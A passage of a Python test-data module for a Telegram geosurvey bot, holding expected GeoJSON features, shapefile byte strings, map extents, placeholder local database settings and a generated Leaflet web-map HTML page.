[[30.0, 30.0], [-30.0, -30.0], [10.0, 20.0], [30.0, 30.0]],
[[40.0, 10.0], [-40.0, -10.0], [70.0, 20.0], [40.0, 10.0]]]
@property
def data_extent(self):
return {'point': 'BOX(-45 -45,45 45)', 'polygon': 'BOX(-40 -30,70 30)'}
@property
def data_triple_map_center(self):
return [{'center_long': 12.5, 'center_lat': 0.0, 'point1_long': -45.0, 'point1_lat': -45.0, 'point2_long': 70.0,
'point2_lat': 45.0},
{'center_long': 0.0, 'center_lat': 0.0, 'point1_long': -45.0, 'point1_lat': -45.0, 'point2_long': 45.0,
'point2_lat': 45.0},
{'center_long': 15.0, 'center_lat': 0.0, 'point1_long': -40.0, 'point1_lat': -30.0, 'point2_long': 70.0,
'point2_lat': 30.0}]
@property
def data_webmap(self):
return {'point': {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'},
'type': 'name'},
'features': [{'geometry': {'coordinates': [45.0, 45.0],
'type': 'Point'},
'properties': {'photo': '<a '
'href="https://telegra.ph/test_path_photo35"><img '
'id="Pic" '
'src="https://telegra.ph/test_path_photo35"></a>',
'question': '<br>question35_1: '
'answer35_1<br>question35_2: '
'answer35_2<br>',
'time': '2021-11-20 22:45:00',
'user': 'Name35',
'video': '<a '
'href="https://telegra.ph/test_path_video35">Click '
'the link.</a>'},
'type': 'Feature'},
{'geometry': {'coordinates': [-45.0, -45.0],
'type': 'Point'},
'properties': {'photo': 'None',
'question': '<br>question35_1: '
'answer35_1<br>question35_2: '
'answer35_2<br>',
'time': '2021-11-20 22:45:00',
'user': 'Name35',
'video': 'None '},
'type': 'Feature'}],
'name': 'Places',
'type': 'FeatureCollection'},
'polygon': {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'},
'type': 'name'},
'features': [{'geometry': {'coordinates': [[[[30.0, 30.0],
[-30.0, -30.0],
[10.0, 20.0],
[30.0, 30.0]]]],
'type': 'MultiPolygon'},
'properties': {'photo': '<a '
'href="https://telegra.ph/test_path_photo36"><img '
'id="Pic" '
'src="https://telegra.ph/test_path_photo36"></a>',
'question': '<br>question35_1: '
'answer36_1<br>question35_2: '
'answer36_2<br>',
'time': '2021-11-20 22:45:00',
'user': 'Name36',
'video': '<a '
'href="https://telegra.ph/test_path_video36">Click '
'the link.</a>'},
'type': 'Feature'},
{'geometry': {'coordinates': [[[[40.0, 10.0],
[-40.0, -10.0],
[70.0, 20.0],
[40.0, 10.0]]]],
'type': 'MultiPolygon'},
'properties': {'photo': '<a '
'href="https://telegra.ph/test_path_photo37"><img '
'id="Pic" '
'src="https://telegra.ph/test_path_photo37"></a>',
'question': '<br>question35_1: '
'answer37_1<br>question35_2: '
'answer37_2<br>',
'time': '2021-11-20 22:45:00',
'user': 'Name37',
'video': '<a '
'href="https://telegra.ph/test_path_video37">Click '
'the link.</a>'},
'type': 'Feature'}],
'name': 'Places',
'type': 'FeatureCollection'}}
@property
def data_geom_gjson_point(self):
return {'check': 1,
'result': {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'},
'type': 'name'},
'features': [{'geometry': {'coordinates': [45.0, 45.0],
'type': 'Point'},
'properties': {'ans_1': 'answer47_1',
'ans_2': 'answer47_2',
'entr_time': '2021-11-20 22:45:00',
'id': 22,
'photo': 'https://telegra.ph/test_path_photo47',
'quest_1': 'question47_1',
'quest_2': 'question47_2',
'survey': 'survey47',
'user_name': 'Name47',
'video': 'https://telegra.ph/test_path_video47'},
'type': 'Feature'},
{'geometry': {'coordinates': [-45.0, -45.0],
'type': 'Point'},
'properties': {'ans_1': 'answer47_1',
'ans_2': 'answer47_2',
'entr_time': '2021-11-20 22:45:00',
'id': 23,
'photo': 'None',
'quest_1': 'question47_1',
'quest_2': 'question47_2',
'survey': 'survey47',
'user_name': 'Name47',
'video': 'None'},
'type': 'Feature'}],
'name': 'Places',
'type': 'FeatureCollection'}}
@property
def data_geom_gjson_polygon(self):
return {'check': 1,
'result': {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'},
'type': 'name'},
'features': [{'geometry': {'coordinates': [[[[30.0, 30.0],
[-30.0, -30.0],
[10.0, 20.0],
[30.0, 30.0]]]],
'type': 'MultiPolygon'},
'properties': {'ans_1': 'answer48_1',
'ans_2': 'answer48_2',
'entr_time': '2021-11-20 22:45:00',
'id': 24,
'photo': 'https://telegra.ph/test_path_photo48',
'quest_1': 'question47_1',
'quest_2': 'question47_2',
'survey': 'survey47',
'user_name': 'Name48',
'video': 'https://telegra.ph/test_path_video48'},
'type': 'Feature'},
{'geometry': {'coordinates': [[[[40.0, 10.0],
[-40.0, -10.0],
[70.0, 20.0],
[40.0, 10.0]]]],
'type': 'MultiPolygon'},
'properties': {'ans_1': 'answer49_1',
'ans_2': 'answer49_2',
'entr_time': '2021-11-20 22:45:00',
'id': 25,
'photo': 'https://telegra.ph/test_path_photo49',
'quest_1': 'question47_1',
'quest_2': 'question47_2',
'survey': 'survey47',
'user_name': 'Name49',
'video': 'https://telegra.ph/test_path_video49'},
'type': 'Feature'}],
'name': 'Places',
'type': 'FeatureCollection'}}
@property
def data_geom_shp_point(self):
return {'check': 1,
'dbf': b'\x03y\x0b\x16\x02\x00\x00\x00a\x01\xf5\x01\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'ID\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00USER_NAME\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00SURVEY\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00TIME'
b'\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PHOTO\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00VIDEO\x00\x00\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00QUEST_1\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ANS_1\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00QUEST_2\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00ANS_2\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r 37'
b' Name53 '
b' survey53 '
b' 20-Nov-2021 22:45:00 https:'
b'//telegra.ph/test_path_photo53 https://telegra.ph/test_'
b'path_video53 question53_1 '
b' answer53_1 question53'
b'_2 answer53_2 '
b' 38 '
b' Name53 survey53 '
b' 20-Nov-2021 22:45:00 '
b' '
b' question53_1 '
b' answer53_1 '
b' question53_2 ans'
b'wer53_2 ',
'shp': b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00N\xe8\x03\x00\x00'
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00'
b'\x00\x80F\xc0\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x00\x00\x80F@'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x01\x00\x00\x00\n\x01\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x80F@\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x02\x00\x00\x00\n'
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00'
b'\x00\x80F\xc0',
'shx': b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\xe8\x03\x00\x00'
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00'
b'\x00\x80F\xc0\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x00\x00\x80F@'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x002\x00\x00\x00\n\x00\x00\x00@\x00\x00\x00\n'}
@property
def data_geom_shp_polygon(self):
return {'check': 1,
'dbf': b'\x03y\x0b\x16\x02\x00\x00\x00a\x01\xf5\x01\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'ID\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00USER_NAME\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00SURVEY\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00TIME'
b'\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PHOTO\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00VIDEO\x00\x00\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00QUEST_1\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ANS_1\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00QUEST_2\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00ANS_2\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r 39'
b' Name54 '
b' survey53 '
b' 20-Nov-2021 22:45:00 https:'
b'//telegra.ph/test_path_photo54 https://telegra.ph/test_'
b'path_video54 question53_1 '
b' answer54_1 question53'
b'_2 answer54_2 '
b' 40 '
b' Name55 survey53 '
b' 20-Nov-2021 22:45:00 '
b' https://telegra.ph/test_path_photo55 '
b' https://telegra.ph/test_path_video55 question53_1 '
b' answer55_1 '
b' question53_2 ans'
b'wer55_2 ',
'shp': b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xe8\x03\x00\x00'
b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00'
b'\x00\x00>\xc0\x00\x00\x00\x00\x00\x80Q@\x00\x00\x00\x00\x00\x00>@'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x01\x00\x00\x008\x05\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00>\xc0\x00\x00\x00\x00\x00\x00>\xc0\x00\x00\x00\x00\x00\x00>@'
b'\x00\x00\x00\x00\x00\x00>@\x01\x00\x00\x00\x04\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x00\x00\x00>@'
b'\x00\x00\x00\x00\x00\x00>\xc0\x00\x00\x00\x00\x00\x00>\xc0'
b'\x00\x00\x00\x00\x00\x00$@\x00\x00\x00\x00\x00\x004@\x00\x00\x00\x00'
b'\x00\x00>@\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x02\x00\x00\x008'
b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00'
b'\x00\x00$\xc0\x00\x00\x00\x00\x00\x80Q@\x00\x00\x00\x00\x00\x004@'
b'\x01\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00D@\x00\x00\x00\x00\x00\x00$@\x00\x00\x00\x00\x00\x00D\xc0'
b'\x00\x00\x00\x00\x00\x00$\xc0\x00\x00\x00\x00\x00\x80Q@'
b'\x00\x00\x00\x00\x00\x004@\x00\x00\x00\x00\x00\x00D@\x00\x00\x00\x00'
b'\x00\x00$@',
'shx': b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\xe8\x03\x00\x00'
b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00'
b'\x00\x00>\xc0\x00\x00\x00\x00\x00\x80Q@\x00\x00\x00\x00\x00\x00>@'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x002\x00\x00\x008\x00\x00\x00n\x00\x00\x008'}
class Result:
"""Container with the result data for the comparison
in test_process.py"""
num = 0
@property
def result_ques_ans(self):
return {'question': [(f'question{self.num}_1',), (f'question{self.num}_2',)],
'answer': [(f'answer{self.num}_1',), (f'answer{self.num}_2',),
(f'answer{self.num}_1',), (f'answer{self.num}_2',),
(f'answer{self.num + 1}_1',), (f'answer{self.num + 1}_2',),
(f'answer{self.num + 2}_1',), (f'answer{self.num + 2}_2',)],
'count': 2}
@property
def result_save_survey(self):
return [None, f'survey{self.num}`', f'survey{self.num}`survey{self.num}`',
f'survey{self.num}`survey{self.num}`survey{self.num}`']
@property
def result_credentials(self):
return {'NAME': 'test_db', 'USER': 'bot', 'PASSWORD': '1234', 'HOST': 'localhost', 'PORT': '5432'}
@property
def result_states(self):
return {'INIT': 1, 'SURVEY1': 2, 'SURVEY2': 3, 'SURVEY3': 4, 'COLLECT': 5, 'POINT': 6, 'POLYGON': 7,
'TRANSIT': 8, 'MEDIA1': 9, 'MEDIA2': 10, 'QUESTION1': 11, 'QUESTION2': 12, 'ANSWER': 13, 'CHECK1': 14,
'CHECK2': 15, 'SUBMIT': 16, 'RESULT': 17}
@property
def result_point(self):
return [45.0, 45.0]
@property
def result_polygon(self):
return [[46.0, 45.0], [47.0, 46.0], [48.0, 47.0], [45.0, 48.0], [46.0, 45.0]]
@property
def result_count(self):
return 2
@property
def result_get_q_count(self):
return 29
@property
def result_set_ans_check(self):
return 1
@property
def result_ans_check(self):
return [1, 'null']
@property
def result_answer_insert(self):
return [[2, 3], [('answer17`_1',), ('answer17`_2',), ('answer17`_3',)]]
@property
def result_get_pp(self):
return '54.0 54.0, 45.0 46.0, 50.0 56.0'
@property
def result_append_pp(self):
return ['54.0 54.0,58.0 48.0', '58.0 48.0']
@property
def result_get_count(self):
return [3, 0]
@property
def result_point_manual(self):
return ('POINT(179 -89)', datetime.datetime.now().strftime("%Y"))
@property
def result_polygon_create(self):
return ("POLYGON((54.35 54,45 46,50 56,54.35 54))", datetime.datetime.now().strftime("%Y"))
@property
def result_save_media(self):
return 'https://telegra.ph/test_path'
@property
def result_media_path(self):
return 'https://telegra.ph/test_path'
@property
def result_extent(self):
return {'point': 'BOX(-45 -45,45 45)', 'polygon': 'BOX(-40 -30,70 30)'}
@property
def result_triple_map_center(self):
return [{'center_long': 12.5, 'center_lat': 0.0, 'point1_long': -45.0, 'point1_lat': -45.0, 'point2_long': 70.0,
'point2_lat': 45.0},
{'center_long': 0.0, 'center_lat': 0.0, 'point1_long': -45.0, 'point1_lat': -45.0, 'point2_long': 45.0,
'point2_lat': 45.0},
{'center_long': 15.0, 'center_lat': 0.0, 'point1_long': -40.0, 'point1_lat': -30.0, 'point2_long': 70.0,
'point2_lat': 30.0}]
@property
def result_distance(self):
return [15038278, 13324945, 13389850]
@property
def result_get_scale(self):
return [19, 6, 1]
@property
def result_gjson_shp(self):
return [[572000, 371], [372, 573000]]
@property
def result_source_webmap(self):
return {'point': {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'},
'type': 'name'},
'features': [{'geometry': {'coordinates': [45.0, 45.0],
'type': 'Point'},
'properties': {'photo': '<a '
'href="https://telegra.ph/test_path_photo26"><img '
'id="Pic" '
'src="https://telegra.ph/test_path_photo26"></a>',
'question': '<br>question26_1: '
'answer26_1<br>question26_2: '
'answer26_2<br>',
'time': '2021-11-20 22:45:00',
'user': 'Name26',
'video': '<a '
'href="https://telegra.ph/test_path_video26">Click '
'the link.</a>'},
'type': 'Feature'},
{'geometry': {'coordinates': [-45.0, -45.0],
'type': 'Point'},
'properties': {'photo': 'None',
'question': '<br>question26_1: '
'answer26_1<br>question26_2: '
'answer26_2<br>',
'time': '2021-11-20 22:45:00',
'user': 'Name26',
'video': 'None '},
'type': 'Feature'}],
'name': 'Places',
'type': 'FeatureCollection'},
'polygon': {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'},
'type': 'name'},
'features': [{'geometry': {'coordinates': [[[[30.0, 30.0],
[-30.0, -30.0],
[10.0, 20.0],
[30.0, 30.0]]]],
'type': 'MultiPolygon'},
'properties': {'photo': '<a '
'href="https://telegra.ph/test_path_photo27"><img '
'id="Pic" '
'src="https://telegra.ph/test_path_photo27"></a>',
'question': '<br>question26_1: '
'answer27_1<br>question26_2: '
'answer27_2<br>',
'time': '2021-11-20 22:45:00',
'user': 'Name27',
'video': '<a '
'href="https://telegra.ph/test_path_video27">Click '
'the link.</a>'},
'type': 'Feature'},
{'geometry': {'coordinates': [[[[40.0, 10.0],
[-40.0, -10.0],
[70.0, 20.0],
[40.0, 10.0]]]],
'type': 'MultiPolygon'},
'properties': {'photo': '<a '
'href="https://telegra.ph/test_path_photo28"><img '
'id="Pic" '
'src="https://telegra.ph/test_path_photo28"></a>',
'question': '<br>question26_1: '
'answer28_1<br>question26_2: '
'answer28_2<br>',
'time': '2021-11-20 22:45:00',
'user': 'Name28',
'video': '<a '
'href="https://telegra.ph/test_path_video28">Click '
'the link.</a>'},
'type': 'Feature'}],
'name': 'Places',
'type': 'FeatureCollection'}}
@property
def result_webmap(self):
return (b'<!doctype html>\n<html lang="en">\n<head>\n <link rel="stylesheet" href='
b'"https://unpkg.com/leaflet@1.7.1/dist/leaflet.css"\n integrity="'
b'sha512-xodZBNTC5n17Xt2atTPuE1HxjVMSvLVW9ocqUKLsCC5CXdbqCmblAshOMAS6/keqq/sMZ'
b'MZ19scR4PsZChSR7A=="\n crossorigin=""/>\n <style>\n body'
b'{background-color: #3d85c6;}\n #main {\n height: 84vh;\n '
b' width: 90vw;\n margin: 0;\n position: abs'
b'olute;\n top: 50%;\n left: 50%;\n -ms-tran'
b'sform: translate(-50%, -50%);\n transform: translate(-50%, -50'
b'%);\n }\n .mapid{\n height: 79vh;\n widt'
b'h: 90vw;\n }\n #Pic{\n width: 100%;\n }\n'
b' #topbar{ \n margin-left: auto;\n '
b'margin-right: auto;\n left: 0;\n right: 0;\n '
b' text-align: center; \n padding: 1px;\n color: whi'
b'te; \n }\n </style>\n <script src="https://unpkg.com'
b'/leaflet@1.7.1/dist/leaflet.js"\n integrity="sha512-XQoYMqMTK8'
b'LvdxXYG3nZ448hOEQiglfqkJs1NOQV44cWnUrBc8PkAOcXy20w0vlaXaVUearIOBhiXZ5V3ynxwA'
b'=="\n crossorigin=""></script>\n <title>Telegram bot</title>'
b'\n</head>\n<body>\n <div id = main>\n <div id="topbar"><b>Name35</b>, '
b'click an object for the popup</div>\n <div id="mapid" class="mapid"></'
b'div>\n </div> \n<script>\n "use strict"\n var Source_point ='
b" {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'}, 'type': '"
b"name'}, 'features': [{'geometry': {'coordinates': [45.0, 45.0], 'type': 'Poi"
b'nt\'}, \'properties\': {\'photo\': \'<a href="https://telegra.ph/test_path'
b'_photo35"><img id="Pic" src="https://telegra.ph/test_path_photo35"></a>\''
b", 'question': '<br>question35_1: answer35_1<br>question35_2: answer35_2<br>'"
b", 'time': '2021-11-20 22:45:00', 'user': 'Name35', 'video': '<a href"
b'="https://telegra.ph/test_path_video35">Click the link.</a>\'}, \'type\': \''
b"Feature'}, {'geometry': {'coordinates': [-45.0, -45.0], 'type': 'Point'}, 'p"
b"roperties': {'photo': 'None', 'question': '<br>question35_1: answer35_1<br>q"
b"uestion35_2: answer35_2<br>', 'time': '2021-11-20 22:45:00', 'user': 'Name35"
b"', 'video': 'None '}, 'type': 'Feature'}], 'name': 'Places', 'type': 'Featur"
b"eCollection'};\n var Source_polygon = {'crs': {'properties': {'name': "
b"'urn:ogc:def:crs:OGC:1.3:CRS84'}, 'type': 'name'}, 'features': [{'geometry':"
b" {'coordinates': [[[[30.0, 30.0], [-30.0, -30.0], [10.0, 20.0], [30.0, 30.0]"
b']]], \'type\': \'MultiPolygon\'}, \'properties\': {\'photo\': \'<a href="'
b'https://telegra.ph/test_path_photo36"><img id="Pic" src="https://telegra.ph/'
b'test_path_photo36"></a>\', \'question\': \'<br>question35_1: answer36_1<br>q'
b"uestion35_2: answer36_2<br>', 'time': '2021-11-20 22:45:00', 'user': 'Name36"
b'\', \'video\': \'<a href="https://telegra.ph/test_path_video36">Click the li'
b"nk.</a>'}, 'type': 'Feature'}, {'geometry': {'coordinates': [[[[40.0, 10.0],"
b" [-40.0, -10.0], [70.0, 20.0], [40.0, 10.0]]]], 'type': 'MultiPolygon'}, 'pr"
b'operties\': {\'photo\': \'<a href="https://telegra.ph/test_path_photo37"><im'
b'g id="Pic" src="https://telegra.ph/test_path_photo37"></a>\', \'question\':'
b" '<br>question35_1: answer37_1<br>question35_2: answer37_2<br>', 'time': '20"
b'21-11-20 22:45:00\', \'user\': \'Name37\', \'video\': \'<a href="https://tel'
b'egra.ph/test_path_video37">Click the link.</a>\'}, \'type\': \'Feature\'}'
b"], 'name': 'Places', 'type': 'FeatureCollection'};\n var map = L.map('"
b"mapid', {\n center: [0.000000,12.500000],\n zoom: 1\n });\n"
b" var CartoDB_Positron = L.tileLayer('https://{s}.basemaps.cartocdn.com/li"
b'ght_all/{z}/{x}/{y}{r}.png\', {\n attribution: \'© <a href="htt'
b'ps://www.openstreetmap.org/copyright">OpenStreetMap</a> contributors © '
b'\' +\n \'<a href="https://carto.com/attributions">CARTO</a>\''
b",\n subdomains: 'abcd',\n maxZoom: 19\n }).addTo(map);\n "
b" var Esri_WorldImagery = L.tileLayer('https://server.arcgisonline.com/ArcGIS"
b"/rest/services/World_Imagery/'+\n 'MapServer/tile/{z}/{y}/{x}', {\tattr"
b"ibution: 'Tiles © Esri — Source: Esri, i-cubed, USDA, USGS, AEX,'"
b"+\n 'GeoEye, Getmapping, Aerogrid, IGN, IGP, UPR-EGP, and the GIS User"
b" Community'\n });\n var Points = L.geoJSON(Source_point,{\n po"
b'intToLayer: function (feature, latlng) {\n return L.marker(lat'
b"lng, {icon: L.icon({\n iconUrl: 'https://telegra.ph/fi"
b"le/bc24c001d928ca59c469d.png',\n iconSize: [20, 20],\n "
b' iconAnchor: [10, 10],\n popupAnchor'
b': [0, -10]\n })})\n },\n onEachFeature: functi'
b'on(feature, layer) {\n layer.bindPopup(`\n <p><b>Nam'
b'e:</b> ${feature.properties.user}\n <br>\n <b>Date/T'
b'ime (non-local):</b> ${feature.properties.time}\n <br>\n '
b' <b>Question:</b> ${feature.properties.question} \n '
b' <b>Latitude:</b> <i>${feature.geometry.coordinates[1].toFixed(4)}</'
b'i>,\n <b>Longitude:</b> <i>${feature.geometry.coordinates[0].t'
b'oFixed(4)}</i>\n <br>\n <b>Video:</b> ${feature.prop'
b'erties.video} \n <br>\n <b>Photo:</b> ${fe'
b'ature.properties.photo}\n </p>`);\n }\n }).addTo(map);'
b'\n\n var Polygons = L.geoJSON(Source_polygon,\n {style: {},\n '
b' onEachFeature: function(feature, layer) {\n layer.bindPopup'
b'(`\n <p><b>Name:</b> ${feature.properties.user}\n <b'
b'r>\n <b>Date/Time (non-local):</b> ${feature.properties.time}\n'
b' <br>\n <b>Question:</b> ${feature.properties.quest'
b'ion}\n <b>Video:</b> ${feature.properties.video} \n '
b' <br>\n <b>Photo:</b> ${feature.properties.photo}\n '
b' </p>`);\n } \n }).addTo(map);\n\n var baseMaps '
b'= {\n "Map": CartoDB_Positron,\n "Imagery": Esri_WorldImager'
b'y\n };\n var vectorL = {\n "Points": Points,\n "Polygons'
b'":Polygons\n };\n L.control.layers(baseMaps,vectorL).addTo(map);\n '
b' var count = 0\n var scbr = L.control.scale({imperial:false})\n map.'
b'addEventListener("zoomend",function (){\n if (map.getZoom() > 5 &&'
b' count === 0){\n scbr.addTo(map);\n count ++;\n '
b' }\n else if (map.getZoom() <= 5) {\n scbr.remove();\n '
b' count = 0;\n }\n })\n</script>\n</body>\n</html> ')
@property
def result_gjson_point(self):
return {'check': 1,
'result': {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'},
'type': 'name'},
'features': [{'geometry': {'coordinates': [45.0, 45.0],
'type': 'Point'},
'properties': {'ans_1': 'answer44_1',
'ans_2': 'answer44_2',
'entr_time': '2021-11-20 22:45:00',
'id': 22,
'photo': 'https://telegra.ph/test_path_photo44',
'quest_1': 'question44_1',
'quest_2': 'question44_2',
'survey': 'survey44',
'user_name': 'Name44',
'video': 'https://telegra.ph/test_path_video44'},
'type': 'Feature'},
{'geometry': {'coordinates': [-45.0, -45.0],
'type': 'Point'},
'properties': {'ans_1': 'answer44_1',
'ans_2': 'answer44_2',
'entr_time': '2021-11-20 22:45:00',
'id': 23,
'photo': 'None',
'quest_1': 'question44_1',
'quest_2': 'question44_2',
'survey': 'survey44',
'user_name': 'Name44',
'video': 'None'},
'type': 'Feature'}],
'name': 'Places',
'type': 'FeatureCollection'}}
@property
def result_gjson_polygon(self):
return {'check': 1,
'result': {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'},
'type': 'name'},
'features': [{'geometry': {'coordinates': [[[[30.0, 30.0],
[-30.0, -30.0],
[10.0, 20.0],
[30.0, 30.0]]]],
'type': 'MultiPolygon'},
'properties': {'ans_1': 'answer45_1',
'ans_2': 'answer45_2',
'entr_time': '2021-11-20 22:45:00',
'id': 24,
'photo': 'https://telegra.ph/test_path_photo45',
'quest_1': 'question44_1',
'quest_2': 'question44_2',
'survey': 'survey44',
'user_name': 'Name45',
'video': 'https://telegra.ph/test_path_video45'},
'type': 'Feature'},
{'geometry': {'coordinates': [[[[40.0, 10.0],
[-40.0, -10.0],
[70.0, 20.0],
[40.0, 10.0]]]],
'type': 'MultiPolygon'},
'properties': {'ans_1': 'answer46_1',
'ans_2': 'answer46_2',
'entr_time': '2021-11-20 22:45:00',
'id': 25,
'photo': 'https://telegra.ph/test_path_photo46',
'quest_1': 'question44_1',
'quest_2': 'question44_2',
'survey': 'survey44',
'user_name': 'Name46',
'video': 'https://telegra.ph/test_path_video46'},
'type': 'Feature'}],
'name': 'Places',
'type': 'FeatureCollection'}}
@property
def result_geom_gjson_point(self):
return (b'{"crs": {"properties": {"name": "urn:ogc:def:crs:OGC:1.3:CRS84"}, "type": "n'
b'ame"}, "features": [{"geometry": {"coordinates": [45.0, 45.0], "type": "Poin'
b't"}, "properties": {"ans_1": "answer47_1", "ans_2": "answer47_2", "entr_time'
b'": "2021-11-20 22:45:00", "id": 22, "photo": "https://telegra.ph/test_path_p'
b'hoto47", "quest_1": "question47_1", "quest_2": "question47_2", "survey": "su'
b'rvey47", "user_name": "Name47", "video": "https://telegra.ph/test_path_video'
b'47"}, "type": "Feature"}, {"geometry": {"coordinates": [-45.0, -45.0], "type'
b'": "Point"}, "properties": {"ans_1": "answer47_1", "ans_2": "answer47_2", "e'
b'ntr_time": "2021-11-20 22:45:00", "id": 23, "photo": "None", "quest_1": "que'
b'stion47_1", "quest_2": "question47_2", "survey": "survey47", "user_name": "N'
b'ame47", "video": "None"}, "type": "Feature"}], "name": "Places", "type": "Fe'
b'atureCollection"}')
@property
def result_geom_gjson_polygon(self):
return (b'{"crs": {"properties": {"name": "urn:ogc:def:crs:OGC:1.3:CRS84"}, "type": "n'
b'ame"}, "features": [{"geometry": {"coordinates": [[[[30.0, 30.0], [-30.0, -3'
b'0.0], [10.0, 20.0], [30.0, 30.0]]]], "type": "MultiPolygon"}, "properties": '
b'{"ans_1": "answer48_1", "ans_2": "answer48_2", "entr_time": "2021-11-20 22:4'
